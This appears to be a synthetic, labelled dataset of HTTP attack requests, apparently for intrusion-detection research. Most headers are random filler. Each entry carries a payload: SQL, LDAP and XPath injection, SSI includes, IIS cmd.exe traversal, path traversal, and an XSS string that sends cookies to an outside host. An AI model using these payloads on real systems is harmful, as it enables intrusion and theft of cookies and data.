GET /HsRL0u79F/eZM6JRe51zU-fdX/ef4liwI/if6r3nAinSo1glSd7E/vs/reeuMtt6tll/VB5QWzw9/nBrswdAtHGD.YZZZcI/eetiloph/t5Ddne1h/nF8cHbD/mieee9ti.htm?ayb=-eSjwgetwrevam&rs2soyi6=2+T8htpasslsakn%7Eh%27%26et&hllfsnteunetsh=%3Balter+table++itesse++set+password+%3D+++++%27ettrrt%27+++++where++name+%3D+%27me%27%3B&BzevdivNPSi=ld&hgNn=347493&VYArcpM0Pobject=3&1An=1nlg&eegElmbepf=7npFIY HTTP/1.0
Host: www.loMot.cz
Connection: close
Accept: audio/*;q=0.6, audio/*, video/mpeg;q=0.7
Accept-Charset: ks_c_5601-1987, iso-8859-2
Accept-Encoding: 
Accept-Language: josm-eyrnnrch, bb-F, nl-oki
Cache-Control: max-stale
Client-ip: 154.205.192.119
Cookie: hTjaji5t=38245540;eRessF= n~t
Cookie2: $Version="18"
Date: Sun, 27 Feb 05 11:55:58 CET
ETag: W/"q9@-@42oTbHORdulE04"
Expect: aho2Bm=aetsd4di;yyd5s
From: tktabU@4ahlq0ig.org
If-Modified-Since: Mon, 23 Mar 09 06:32:03 UTC
If-Unmodified-Since: Mon, 28 Aug 06 18:14:01 UTC
If-Match: "WC_sA9U12wVxJI9ag"
If-None-Match: *
If-Range: *
Max-Forwards: 63
MIME-Version: 0.7
Pragma: tyn1nq='pC3'
Proxy-Authorization: Digest response="EDaFEE464Cd220549436Ba0ec5F670E1"
Authorization: 1amnfh fgysaSi=yomEae
Range: 4781-
Referer: http://wegeie.st/lhKDbo/afres59/hazOh/oTz0TAA/XEaehen.sh
TE: deflate,trailers
Trailer: Expect
User-Agent: Mozilla/2.9 (compatible; Konqueror/3.1; Linux i386; totM7; aoiTmadoef)
UA-CPU: StrongARM
UA-Disp: 234,2266,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 3499x504
Via: HTTP/3.2 www.hi7Npt.shtml
Transfer-Encoding: ktfi
Upgrade: cosqd/4.3
Warning: 795 www.ocntp.jpg "satrsjzkse" "Sat, 22 Aug 09 08:49:22 CET"
X-Forwarded-For: 229.231.134.44
X-Serial-Number: 036660331124122
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42157
Start - Id: 37141
class: LdapInjection
GET /-pEGXincludeuE/soyBgayprXlsuofS1/tN_efrnd92V.swf?2inlmaRydjir=sa8%7Esmhs%3Eboot.iniIss+hna0A&aMeafabseco=l9atweoidtg&2Twinnthj-WDZj=006069&45ot=3&etxrlhdXit=TstolcTwgsC&lvhetsiliosacr=9&riiTH4ljhh9who=fi+e&hft7snem=e&ltao=eMgT2Fdk&edenneL=485789&jsio68iy=46419680&ws=nootO+rg%3Ee8Irt&n2a1tnesaebo9=%29++%28++%7C+++%28cn%3D*o++%27brien*+++%29%28mail++++%3D*o++%27brien*%29++++ HTTP/1.1
Host: 110.177.61.36:80
Connection: keep-alive
Accept: text/*;q=0.4, audio/*, audio/basic
Accept-Charset: *
Accept-Encoding: *;q=0.2
Accept-Language: *
Cache-Control: no-store
Client-ip: 186.207.13.158
Cookie: eraem90=o.z0D1KRqC-0
Cookie2: $Version="916"
Date: Sat, 01 Mar 08 15:55:13 GMT
ETag: W/"0xXDm_hysMwnCgoAJ"
Expect: dlmehE
From: m0oefy@tNuodgrTta.org
If-Modified-Since: Mon, 14 May 07 10:59:09 UTC
If-Unmodified-Since: Tue, 03 Jul 07 14:51:01 GMT
If-Match: "1a6Mi1dl.UsE3pbzY"
If-None-Match: *
If-Range: Thu, 28 Dec 06 17:55:02 CET
Max-Forwards: 9
MIME-Version: 8.7
Pragma: no-cache
Proxy-Authorization: NTLM SWhyYWEwZXJOR29UdG5pOGh3c3JhYWRyb2pvbkw1c2VycHU=
Authorization: Basic aW9jMDY6Ung4ZQ==
Range: 1-,52545-
Referer: /6aLc/curEp/neAf/errha/tj4ih.rar
TE: trailers,chunked;q=0.8,gzip;q=0.3
Trailer: Accept-Language
User-Agent: oranlu5lo (mjVSyXQP; 7GrTkBSll.)
UA-CPU: StrongARM
UA-Disp: 529,581,8
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 617x3755
Via: HTTP/7.6 157.177.143.16, 0.9 www.liim.css
Transfer-Encoding: compress
Upgrade: lunch/5.6, pdEss0/7.0, krsnd/5.3, eeh7tt/5.5, oqeat/4.8
Warning: 068 www.caus6t.html:451 "nAiwBaHg" 
X-Forwarded-For: 84.40.27.181
X-Serial-Number: 4738976742686812
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37141
Start - Id: 39352
class: SSI
GET /a.Xixrd/weGpH-htpassYXVHx.tiff?do3hk9ifrootza=%3C%21--%23email+fromhost%3D%22www.callov.com%22+tohost%3D%22mailbox.otls.com%22+message%3D%22odzxfc+ehtirih+otSol+chR%22+fromaddress%3D%22o09ws.com%22+toaddress%3D%22mdxhk.du9.com%22+subject%3D%22tR5%22+sender%3D%22f8b.com%22+replyto%3D%22urloo.com%22+cc%3D%22jgB%22+inreplyto%3D%22lsP+7t7+esrtu%22+id%3D%22plwnjmail%22+--%3E HTTP/1.1
Host: www.tmmit.st
Connection: Kiob
Accept: */*;q=0.6
Accept-Charset: *;q=0.1
Accept-Encoding: 
Accept-Language: *;q=0.2
Cache-Control: no-cache
Client-ip: 183.110.148.152
Cookie: AneceNt3=boot.ini-y2tE o'O0etelswhere/n;ulaen3cey=8c'sscwgety:liframeAMrdo]T;ThzBtaie=055;p98=dNQB;heowsndjet=g
Cookie2: $Version="50"
Date: Mon, 10 Nov 08 23:54:50 CET
ETag: "ZigisWD3SleJ7SIJWoF"
Expect: 1eaet=xvho;paeeore=ucea
From: ztifisTh@itMb.uk
If-Modified-Since: Mon, 13 Oct 08 21:43:56 CET
If-Unmodified-Since: Sun, 26 Nov 06 07:23:42 GMT
If-Match: "-aUfKaKEi7JU9073kL."
If-None-Match: "kyW_H@6G9d84fr9Ug_uT"
If-Range: *
Max-Forwards: 28
MIME-Version: 9.5
Pragma: no-cache
Proxy-Authorization: NTLM ZWFtb25kbXdsZm10ZWp0dG9Ub3NsZGlheHJhZWVoUDVyT3NtcDlwZWh0c2hIdHNl
Authorization: Digest qop=auth-int
Range: 1-35,9436-,-246816
Referer: /ch98/ecyad/adwtlj/lertegv/tgi5tre.js
TE: trailers
Trailer: Host
User-Agent: Mozilla/4.1 (Machintosh; U; Mac OS X 5.9; ga-rp; rv:5.6.0) Gecko/38394126
UA-CPU: 68000
UA-Disp: 9327,7903,32
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 5277x2991
Via: gfpEe/5.9 www.2pia3ra.jpeg, OoPUYa/3.6 213.183.54.18:8
Transfer-Encoding: teee
Upgrade: Dimzxj/0.5, brr9/9.8, nqe8/0.3
Warning: 944 www.Jaealoez.html "Tccdyealtgcne" "Wed, 07 Dec 05 16:52:07 UTC"
X-Forwarded-For: 198.159.65.26
X-Serial-Number: 802337450581
----: --------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 39352
Start - Id: 49085
class: XPathInjection
GET /aprVmJINFp.html?shteo7h=dp%27+or+%28i+++++%3C+count%28lk%2Fchild%3A%3Atext%28%29%29+++and++j++++%3C+++count%28ned%2Fchild%3A%3Acomment%28%29%29+++++and++k++++%3C+++count%28enewpo%2Fchild%3A%3A*%29++%29+or++++%274antei%27+%3D++%27+++++eWldxe%27+++++or HTTP/1.1
Host: www.d9nls8nd.be
Connection: keep-alive
Accept: text/plain
Accept-Charset: windows-1255;q=0.2, iso-8859-8-i, cp-936
Accept-Encoding: gzip;q=0.7
Accept-Language: 9-k;q=0.2, owx-t0cre, nmIyC-sc0aie, vtikhse-5diiho8i;q=0.2, esz-vCr;q=0.2
Cache-Control: min-fresh=66324
Client-ip: 111.104.86.65
Cookie: 56i=afg;eae4Ieiea1ttwto=5entrioRuiyotjni;peatocck=hfi_8Z_y
Cookie2: $Version="34"
Date: Sat, 17 Jan 04 15:59:46 UTC
ETag: W/"qnDBCfbZuKmSGx_h3.Q."
Expect: uotniqud=2tuam1Po;Hd2ei
From: eynba@e3yzoc.com
If-Modified-Since: Fri, 16 Feb 07 09:36:27 CET
If-Unmodified-Since: Sat, 15 Aug 09 22:23:50 UTC
If-Match: *
If-None-Match: *
If-Range: "d0f0VF0rTPq0r9j5lP"
Max-Forwards: 0
MIME-Version: 4.7
Pragma: no-cache
Proxy-Authorization: Digest username="tlens"
Authorization: NTLM ZGVtdTV5dGR0ZVJvaXptc3JyN2hpb3doZTZvT2liYXVl
Range: -39415,-80233
Referer: /weNAatg/ooms3wi/btetm.txt
TE: gzip;q=0.7,gzip
Trailer: Upgrade
User-Agent: 2k3Sp.@i http://www.2lOsle.de
UA-CPU: x86
UA-Disp: 3801,296,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 7313x7197
Via: 7.6 www.goib.tiff
Transfer-Encoding: identity
Upgrade: 5yOeb/5.2, csz/2.8, soyn/4.8, ngtnf/9.9
Warning: 032 www.mhnSre.js "nIcaleerr" "Sat, 08 Jan 05 06:49:45 UTC"
X-Forwarded-For: 43.74.174.24
X-Serial-Number: 7433292
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49085
Start - Id: 42650
class: SqlInjection
GET /lyllfrliMem/rdeigfhyLesiy4cRurd/d258p/sTl1kBRoekLC/sY/eI8tkdoer6w.htm?osho=%3B+++++EXEC%28+++%27UNI%27%2B%27ON%27%2B%27++++%27%2B%27SEL%27%2B%27ECT+++++++%27Llqron%27%2C99%2C865238%2C%27eAileE%27%2C9+FROM+++ertug%29&asenttri0=sK%40eW&xystt=997&br=q HTTP/1.0
Host: www.uqgts.org
Connection: hjcone
Accept: text/*
Accept-Charset: iso-8859-15, windows-1258;q=0.3
Accept-Encoding: 
Accept-Language: *;q=0.4
Cache-Control: no-store
Client-ip: 183.138.44.237
Cookie: ceeo4=803
Cookie2: $Version="2"
Date: Fri, 01 Sep 06 21:33:32 CET
ETag: W/"d99n_-k.LjOX0-pI"
Expect: 100-continue
From: z74ht@xqb9ivEose.gov
If-Modified-Since: Sat, 05 Aug 06 18:26:11 UTC
If-Unmodified-Since: Sun, 22 Feb 04 15:33:12 UTC
If-Match: *
If-None-Match: *
If-Range: "IEn8juBMUOS2xQRK"
Max-Forwards: 4
MIME-Version: 3.2
Pragma: Etig='cmMkrIuo'
Proxy-Authorization: NTLM bW9tc2VkRWh1Y21SbnRPbmJ0ZUNhZXllVGVoMm9lbHRQZ3Vt
Authorization: Digest realm
Range: -5
Referer: /m16o/raS9dIr/8nPwYoro/siKlya/rac7Cn0r.fgf
TE: trailers
Trailer: Accept-Charset
User-Agent: Mozilla/5.2 (X11; U; Unix 5.8; tp-hi; rv:2.0.4) Gecko/91324857
UA-CPU: PowerPC
UA-Disp: 0660,7144,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 4720x346
Via: HTTP/4.6 www.tdmz.tiff, 7.2 www.1yntgg.png, FTP/2.8 www.d7rtnh.htm
Transfer-Encoding: gzip
Upgrade: tehfc/4.6, Ehs/2.9, ereo/5.2
Warning: 577 221.133.112.12 "Eaaers" 
X-Forwarded-For: 251.163.13.200
X-Serial-Number: 81024686129
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 42650
Start - Id: 43925
class: OsCommanding
GET /file.bat/..��..��..��winnt/system32/cmd.exe/c dir C:georgi.asp/..��..��..��file.ext? HTTP/1.0
Host: www.syat.com:80
Connection: d0e4ns
Accept: audio/basic;q=0.3
Accept-Charset: *
Accept-Encoding: 
Accept-Language: cfdHn-E3uLaf
Cache-Control: max-stale
Client-ip: 22.30.133.135
Cookie: 1ny=:in>rtmp05system-&lmhcrG
Cookie2: $Version="32"
Date: Sun, 13 Feb 05 24:37:36 CET
ETag: W/"-Jl8DiWFDsHzT49DVh"
Expect: nweoMudA
From: ri9h6cs@tZrtxhhdgg.be
If-Modified-Since: Sat, 19 Feb 05 05:22:48 UTC
If-Unmodified-Since: Tue, 02 Jan 07 20:21:25 UTC
If-Match: "Hpz7QkwsSHPIH8@F"
If-None-Match: "CnVUCg0eTIW079i"
If-Range: *
Max-Forwards: 633
MIME-Version: 9.1
Pragma: nepwates=tdpISl4y
Proxy-Authorization: enro elaaRn=qkanorol
Authorization: Digest realm
Range: 6652-,-36477,66590-93
Referer: /ni69obms/IoaaTB/ro30jaO.msf
TE: gzip;q=0.0,deflate
Trailer: Accept-Charset
User-Agent: tioifyta (sjwjMX51ki; 95GyvSNl; aarnSt6-Su; ufKz6T)
UA-CPU: StrongARM
UA-Disp: 527,703,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 428x0275
Via: HTTP/2.4 www.sdGll.gif
Transfer-Encoding: gzip
Upgrade: ezwy/1.5, eqeld/8.1, sddee/2.4, yghane/1.4
Warning: 590 204.118.91.69 "eitd3dnkcep3Sina3" 
X-Forwarded-For: 206.43.118.58
X-Serial-Number: 221610848523557
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43925
Start - Id: 38733
class: LdapInjection
GET /R93h2eD1jbTrem0h/iqpRYSU@v/rcpniO0rwt/otchprOu/Oa/uNsoladezse/rLtHZoMis8.jpeg?system8NfeC0VMQV_=07433&_WrcoVnph-D4=mtyTohesrspmad0ea&9AgF5rSdQ=796&sdceueener=i&2u=7trssGtn&atfbeoae=%29%28+%7C++%28cn%3D*o+++%27brien*+%29%28mail%3D*o+++%27brien*+%29&0Gonoih5tan=ca&Nrt4ctiraeesuar=26321&zdowiae=inwinntl7g&niUveesm=+%3Byrdieuknph-fHl%3Dbetcm&WlX7pu6XQV=w7owgtlapddnho6etg HTTP/1.0
Host: 11.84.242.183
Connection: ttos
Accept: text/plain;q=0.2
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: omiein-rh, rSneyl-2eohosj;q=0.7
Cache-Control: max-age=34191
Client-ip: 132.36.253.148
Cookie: dhNetz=s74;v72EQ=bOlwct;tsrsysdefta=nhas81includehuoBgt 0;ntistyd7Orekt=r4avoeoswdlrh;oDF7AkK_=Nh;riYSZe1bAjarpyn=1
Cookie2: $Version="09"
Date: Sat, 20 Nov 04 08:10:34 GMT
ETag: "3@dn_UCGIlqI_Vtrv8"
Expect: 100-continue
From: siyWs@6ac5m.it
If-Modified-Since: Tue, 06 Nov 07 15:34:13 GMT
If-Unmodified-Since: Sun, 22 Feb 04 18:08:18 GMT
If-Match: "2Q.2CGmKCecOF8C4ko"
If-None-Match: *
If-Range: Thu, 07 Aug 08 05:05:00 CET
Max-Forwards: 455
MIME-Version: 5.4
Pragma: no-cache
Proxy-Authorization: ztgn ZDrc=dnonaeea
Authorization: Digest username="76nlskE"
Range: -753,93960-,-52
Referer: /tigtds6s/r5epeat/eluInd/SeiSi2h.dll
TE: chunked;q=0.1
Trailer: Authorization
User-Agent: nnutaAi/2.0
UA-CPU: 68000
UA-Disp: 281,271,16
UA-OS: Win95
UA-Color: color8
UA-Pixels: 094x3377
Via: 6.6 www.ppnlEtnm.html, 0.3 204.0.213.106, 0.1 www.sOaxol3.shtml:27579
Transfer-Encoding: deflate
Upgrade: 5esn/7.7, ztlS/0.9, er6/2.0, rdryli/6.5, mla/1.5
Warning: 815 www.sni22ed.shtml "iihdw6iguibnuR" 
X-Forwarded-For: 18.156.103.46
X-Serial-Number: 320181381664910
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38733
Start - Id: 44527
class: OsCommanding
GET /scripts/file.bat" "& dir c:/ .exe? HTTP/1.1
Host: www.e6seagTen.biz:80
Connection: bsoums
Accept: */*;q=0.8
Accept-Charset: iso-2022-kr, us-ascii, windows-1252, us-ascii;q=0.7
Accept-Encoding: *;q=0.0
Accept-Language: oETh-1
Cache-Control: min-fresh=06
Cookie: occhecsmCeeEe=ct@qN@7W@56P;VHAS-usr=hqao3hbtDtLuts;ppseedi=o6i;dcddgriiiestce=cGIt88rI5;QxWBb.=m 
Date: Sat, 02 May 09 19:01:08 GMT
ETag: W/"pik_981fbQAX0z-QQeD"
Expect: rhea
If-Range: Wed, 03 Nov 04 07:02:32 GMT
Max-Forwards: 82
Pragma: no-cache
Authorization: Digest response="208F600d95D2dDe4DB8BB5BaA6EEC86a"
Referer: http://www.hrtmed.gov/tetf/iaese/iLxnehm/wATuan.php
TE: trailers,trailers
User-Agent: mcic (lTH_6sX; gBswnomJE4)
UA-Disp: 0128,935,8
Via: 5.7 www.aqldp2tu.tiff:56674, 2.8 203.217.240.173
Transfer-Encoding: compress

null

End - Id: 44527
Start - Id: 46612
class: XSS
GET /taWm/Vtr3Y20aOlSS/lll/passthrumailP.PPPtmpr3-974L/MnetcatN.jpeg?ts2ouaseeohuird=1&ye=40cs3totuoarzb&yephxlGC4m=lnnvCrMfTZ&ief=lclogentle&puhrin5t2feoEt=h9PnLM6KRq&.n8._NU=1951931&6Iv=u%2BtE%5B&nu5kxo=1&2PGU0libPu57M-=581&0hhCdg9sb2=PeEoeiLsiknshtj&reheOnexwct=group+bye+eNsei&linkhG_=i7Eo%7Cr2Byt&roeaoor=4078965405&ep=7424 HTTP/1.1
Host: www.cdsILrue.cz:9
Connection: rgto
Accept: */*;q=0.7
Accept-Charset: *;q=0.0
Accept-Encoding: deflate;q=0.3
Accept-Language: [\xC0][\xBC]script   >[document.location.replace    ('http://www.enerti.com/cgi-bin/teinri.cgi'+document.cookie);][\xC0][\xBC]/script    >
Cache-Control: Ee1lyai='odctnrle'
Client-ip: 58.236.152.142
Cookie: nt7=se
Cookie2: $Version="70"
Date: Thu, 01 Sep 05 21:17:36 UTC
ETag: "Ux4OQ9o1GIy2X_88aSM"
Expect: ojtqh2=jrftdNh;ooree
From: fa4oar@deOvi.uk
If-Modified-Since: Tue, 25 Apr 06 22:09:47 CET
If-Unmodified-Since: Tue, 05 Jul 05 21:03:42 CET
If-Match: "azZgVZ@U8xVGB46nAqRs"
If-None-Match: *
If-Range: *
Max-Forwards: 728
MIME-Version: 1.9
Pragma: l='ritua5aO'
Proxy-Authorization: Digest username="6LlGdn"
Authorization: Basic SXRvcm46NG5oTmo=
Range: 7283-8
Referer: /aeaasmiA/len3/rnTemn.gif
TE: trailers,deflate,deflate;q=0.9
Trailer: Host
User-Agent: aT4t/8.0.2.7
UA-CPU: PowerPC
UA-Disp: 7714,181,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 950x529
Via: 2.2 www.PeesNno.png, FTP/0.0 www.nusertae.htm:699
Transfer-Encoding: compress
Upgrade: 1ssnt/2.7, Necil/0.4
Warning: 045 www.g6oeJmh.shtml "HEkdlTofnTpdehenjd" 
X-Forwarded-For: 245.134.55.175
X-Serial-Number: 43388399
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46612
Start - Id: 39685
class: SSI
GET /zHa/a7Nt9slibA/nditche38/X7cnafan1lnL.jpeg?8ElozhRsizhno=09593374&riUaraete1inni=wget%40&staihhhio=%3C%21--+++++%23include++virtual%3D%22%2Fetc%2Fhttpd%2Fhttpd.conf%22+++--%3E&nrDrsmRhgo=4895&aootu5yi=740&hoIkantyi9=Ck&oxejoarth27loe8=eSXAgA5e_JW&MOyagd=i&rmlAi0K=%5C+o%5Co%3Cftxterm6&F@Evinputxj4ar=to%3Bty%25a0%3Br2tc&hb=ex HTTP/1.0
Host: 93.138.171.165:80
Connection: close
Accept: */*
Accept-Charset: x-mac-turkish, shift_jis;q=0.4, windows-1258, x-mac-arabic;q=0.4, koi8;q=0.0
Accept-Encoding: gzip;q=0.3, identity;q=0.8, identity
Accept-Language: *
Cache-Control: no-store
Client-ip: 210.184.120.254
Cookie: DS_K4yWxmlt=824;h8fe=t]i
Cookie2: $Version="5"
Date: Fri, 08 Feb 08 19:49:26 GMT
ETag: "MnC6RG5yCfdECDak"
Expect: 100-continue
From: 3eirio@eo6tyedee.gov
If-Modified-Since: Thu, 21 Jan 10 19:22:33 GMT
If-Unmodified-Since: Wed, 14 Jul 04 02:34:49 CET
If-Match: *
If-None-Match: "@-kavspjHFYd0-EHh"
If-Range: *
Max-Forwards: 4
MIME-Version: 9.9
Pragma: 2egaoA=etIi
Proxy-Authorization: Digest realm
Authorization: prysso qm3ey=eoeaDme
Range: 1-2703
Referer: /gwAo1/xmOs.wmn
TE: gzip;q=0.8
Trailer: User-Agent
User-Agent: Mozilla/0.9 (Machintosh; U; Mac OS X 7.1; h0-od; rv:6.5.9) Gecko/16783235
UA-CPU: Sparc
UA-Disp: 0266,938,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 726x074
Via: FTP/0.5 www.ttarfotw.png
Transfer-Encoding: deflate
Upgrade: im0/0.0, gln/3.7
Warning: 245 www.etcYe.gif "ra5teOtlcka8shsedl7" 
X-Forwarded-For: 166.133.168.205
X-Serial-Number: 9911764547155
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39685
Start - Id: 40940
class: SSI
GET /d6tnuheRascx/ds1j0t/5dCb371YjGfJK/tiihsir/lzre4NnntaTvraa.cfm?rF8XcYPx11l=abu&wCLMOinZs.s.=%3C%21--++%23odbc+++++statement+%3D+++%22select++OcsxCooh%2C+++df%2C+++++1e+from+++++rurooizpl+++order+++by+++++4%2C+++++63%2C+++1%22+--%3E&th=J%3A&lstpC=%5Cwt%40+&rN35servicesj71=26740375 HTTP/1.1
Host: 193.57.68.241
Connection: close
Accept: text/*
Accept-Charset: iso-8859-5;q=0.1, x-mac-cyrillic, euc-cn;q=0.0, cp-950;q=0.0, cp-950
Accept-Encoding: 
Accept-Language: tettnyh-hk9An;q=0.4, iaetue-xonIoi4i
Cache-Control: no-transform
Cookie: nxn=cbnp=Tbodyouyh1ib;szn5t=83403783
Cookie2: $Version="722"
Date: Tue, 30 Aug 05 14:41:25 CET
From: Haebia@tynesoi.fr
If-Unmodified-Since: Thu, 09 Jul 09 24:42:51 UTC
If-Match: *
If-Range: *
Max-Forwards: 7724
Authorization: ti5cm Taih6t=ii7te
Range: 4-
Referer: /saD5/eePn/YNaa7sbr/e0gtsoS.tiff
TE: deflate,trailers,gzip
User-Agent: steaniaMns (rEi2lWzQt; hA07D9aa; cwlmLDKQ)
UA-Color: color8
UA-Pixels: 877x4813
Via: 4.8 www.rlet.jpg, 9.4 www.ekEo.png
Transfer-Encoding: gzip
----: ----------

null

End - Id: 40940
Start - Id: 37203
class: LdapInjection
GET /iz99I/.qlocation/2ertunansfdedp97edrs/svhmuxlptsyht1oi8s3/uernwlo8amiatsspepoc/dCdaetcsdpVioa/aJtMEoq/exlVYEKrbMWKv/dt2eP5Txky4q.8zBT/okOdiio1b4raslxpsuye/bgsoundUprocessing-instructionuFV-CUhtaccesz/r-lDe5s.png?CdocumentmochainsertN=4129846&0tj=l4nfoeye&execHB%u86u968b=roau&tewl9=%3E&rwdh4nsTeisrn=6488093003&ibei5=js%40PhXDOF&ivIemiuoESheuon=%26i%3Fa&iuclh=113&ehhheqa7nngeri=%29++++%28+++%7C++++%28Sac%3Dne*%29 HTTP/1.0
Host: www.ezvs.biz
Connection: close
Accept: */*;q=0.3
Accept-Charset: x-mac-hebrew, big5, shift_jis;q=0.2
Accept-Encoding: deflate, compress;q=0.5, gzip;q=0.5, gzip;q=0.0
Accept-Language: *;q=0.3
Cache-Control: max-age=1616
Client-ip: 163.27.72.204
Cookie: Esoclanua=etrrmneOnttqgeia;access_logUvsC4M9y=0h;3an5ltrtnjae=i;cse=54834;bn=3;ggliwe8sifo7=n-cqsc
Cookie2: $Version="690"
Date: Sat, 21 Jan 06 11:37:18 CET
ETag: "PCIxv9iyeJsoKA5p"
Expect: 100-continue
From: eeae@rreIhhhha.biz
If-Modified-Since: Thu, 04 Sep 08 19:47:21 GMT
If-Unmodified-Since: Sat, 04 Jul 09 09:00:24 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 34
MIME-Version: 2.5
Pragma: shmoapr8=phcsroay
Proxy-Authorization: Basic ZHdiZFdlOm9kaWdlVWF0
Authorization: Basic ZWZhczpkaTJtaHc=
Range: 605-286224
Referer: /0eNe/gme0hi4r.bin
TE: trailers,deflate;q=0.6,deflate;q=0.0
Trailer: Trailer
User-Agent: Mozilla/9.9 (Machintosh; U; PPC 1.9; ir-ht; rv:3.5.2) Gecko/01544089
UA-CPU: Sparc
UA-Disp: 4047,0109,8
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 0874x8291
Via: 0utfcq/8.1 121.146.79.83:1604, FTP/6.1 www.aQ1Aesht.css:144, FTP/4.7 27.138.69.23:311
Transfer-Encoding: identity
Upgrade: qsf/6.6, r6nf/1.0, nSh/1.8, fseh/4.5, encob/8.5
Warning: 515 www.RAeg.png "aholxfeqpy" "Wed, 27 Jan 10 22:49:12 GMT"
X-Forwarded-For: 209.47.70.154
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37203
Start - Id: 44780
class: PathTransversal
GET /neww4fresNk/V-KTAEG/2oereKseu/neOtnqiechystooote/apEhabhNB784sm7F9.jpg?varR16=n%407dMQcCz5TF&melmndataesJui=..%2F..%2F..%2Fmemama%2Fadmin.txt HTTP/1.0
Host: 123.225.89.133:2
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.5
Accept-Language: s0gt2ue-ys3tdiw;q=0.2, Hygl-h;q=0.1, gogeEcie-ike8cpi;q=0.2
Cache-Control: no-cache
Client-ip: 229.119.79.242
Cookie: nmc==E7;ntid2zdn7ds=nqienw2fPetd7abhw;lnltpenhW1rho=ehihehncld
Cookie2: $Version="8"
Date: Fri, 14 Dec 07 19:52:43 UTC
ETag: "P7JK-nkZJbb@PMNJ78a"
Expect: 100-continue
From: iddCt@3ahi.gov
If-Modified-Since: Wed, 27 Dec 06 21:57:59 CET
If-Unmodified-Since: Mon, 16 Feb 04 03:17:09 UTC
If-Match: *
If-None-Match: "kpwvyelLFc1LH0kyPV"
If-Range: "kkjXyaYb9_QMuAyd@wAE"
Max-Forwards: 6793
MIME-Version: 2.7
Pragma: uha2omj=hhk
Proxy-Authorization: Digest realm
Authorization: gq2A 3Ooedaf=yhqdtn
Range: 6578-336232,-258470,45228-5909
Referer: http://t7kte7tA.org/hrnhpw.png
TE: trailers,deflate
Trailer: Warning
User-Agent: Mozilla/5.1 (Machintosh; U; PPC Mac OS X 3.5; Sa-tu; rv:2.9.3) Gecko/68247978
UA-CPU: MIPS
UA-Disp: 3445,5667,32
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 822x152
Via: tles/3.0 www.m5eaao.tiff:5
Transfer-Encoding: compress
Upgrade: xdn/6.9, zath/4.3, enftae/3.8, tsot/2.4
Warning: 651 www.ohli.jpeg "ze4iSksESreE" 
X-Forwarded-For: 39.131.202.145
X-Serial-Number: 2157159271334
----: -----------------
~~~~~: ~~~~~~~~~~

null

End - Id: 44780
Start - Id: 41095
class: SqlInjection
GET /1ux06/sx.jsp?srAiNi0=rDg6gK&N_Ffk4@B=th0EHeAx&hafreiieioyEnM=slXHk&whie1l=%7Ead+&xrcp1d=uo%3CW&renUsitntnj=wted8%27+v%3B3s&abe=+retRih&adwaeoc=u+eea%5Ds%5Ber&Noplo=81224811&rtptnnry=Rg%7C+or5lser%2FL-e+&neik=exec+++xp_regwrite++++%27HKEY_LOCAL_MACHINE%27%2C%27SOFTWARE%5CMicrosoft%5CMSSQLServer%5CClient%5CConnectTo%27%2C%27ixhdaaei%27%2C%27REG_SZ%27%2C%27DBMSSOCN%2Chackersip%2C80%27&eopqmdrI=r5uiammtec5ee+E&t2EE=sebpIlgn4 HTTP/1.0
Host: www.efhuilO2u.net
Connection: close
Accept: */*;q=0.0
Accept-Charset: *
Accept-Encoding: 
Accept-Language: rc-h, bnJevqrh-2eaniegr;q=0.1, Snd20e-uwetyg;q=0.9
Cache-Control: max-age=82
Client-ip: 173.76.68.167
Cookie: seepe4Ejene=snGdswds\window.openrsterfn:;H8tCeAPer=cepassthruq oxtermml)cd: r$forms;uTiOpuaarta=u;sg35sO=0tdxt;1mail0vSlibservicesuEMYchild=ksfbn
Cookie2: $Version="810"
Date: Sat, 03 Mar 07 05:55:06 CET
ETag: W/"pNa_WXpEGDiRA7WpPUNe"
Expect: todx=mj6wd7;rmdo
From: ixits@nymeatnrae.gov
If-Modified-Since: Tue, 26 Apr 05 12:14:35 GMT
If-Unmodified-Since: Thu, 25 Jun 09 22:34:23 UTC
If-Match: "nT@nSO@XJKCZS-0CJw"
If-None-Match: *
If-Range: *
Max-Forwards: 08
MIME-Version: 7.6
Pragma: ttd=meyga
Proxy-Authorization: Digest username="seeg"
Authorization: nedle 4l5o=4osg
Range: 1-877
Referer: /fponaE/olieB/o4er.php4
TE: chunked;q=0.1,trailers,trailers
Trailer: User-Agent
User-Agent: Mozilla/5.7 (compatible; Konqueror/1.2; Win98; osunes; bbkl; rra8)
UA-CPU: PowerPC
UA-Disp: 2063,773,32
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 194x0684
Via: FTP/1.7 www.aepqY.css:07
Transfer-Encoding: proa2
Upgrade: trcoos/7.4, ocdNs/3.5
Warning: 451 198.72.245.237:3639 "gyrmlem" 
X-Forwarded-For: 84.186.228.20
X-Serial-Number: 54708069609443708
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

